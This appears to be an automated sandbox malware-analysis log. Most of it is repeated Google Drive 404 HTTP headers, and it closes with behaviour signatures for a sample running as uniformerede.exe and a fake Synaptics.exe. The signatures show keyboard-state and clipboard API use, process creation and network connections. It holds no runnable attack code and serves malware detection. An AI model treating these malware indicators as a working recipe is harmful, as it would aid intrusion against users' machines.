                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:21 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Jwo8YNn7apHNif3dNNwORg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:22 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: script-src 'report-sample' 'nonce--M3PXO3RAuR4BKAvWbYB7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2Sq4Ic8OXa_tkloownQlKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-cV3EiRkhzpvUmg1rEmBE6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-3TPsn48xaQPKkGwymNjxxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2zZqCf538bpNUCHh-XV8Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Content-Security-Policy: script-src 'report-sample' 'nonce-xLDmZzE8U_Q17M8WWwO6Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:23 GMTStrict-Transport-Security: max-age=31536000Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-q_WwuXe4XGTluFaUH4GtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j4jchXbwVQLmIeHkuwST4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Content-Security-Policy: script-src 'report-sample' 'nonce-F69_pKNlsi_vh4bFmrC-yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportReport-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-00CzyXufRNr6eJhID_c9KA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 27 May 2022 02:38:24 GMTStrict-Transport-Security: max-age=31536000Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-EOvmVxVbQaFC3tSzPkmSHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
                                Source: Synaptics.exe, 00000009.00000003.342497057.00000000054F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.comdeveloper.android.google.cndevelopers.android.google.cnsource.android.google.cn equals www.youtube.com (Youtube)
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0043C1FC GetKeyboardState,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004289FC GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00429040 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004601F0
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0046C7CC
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0048C7F4
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_0044EA40
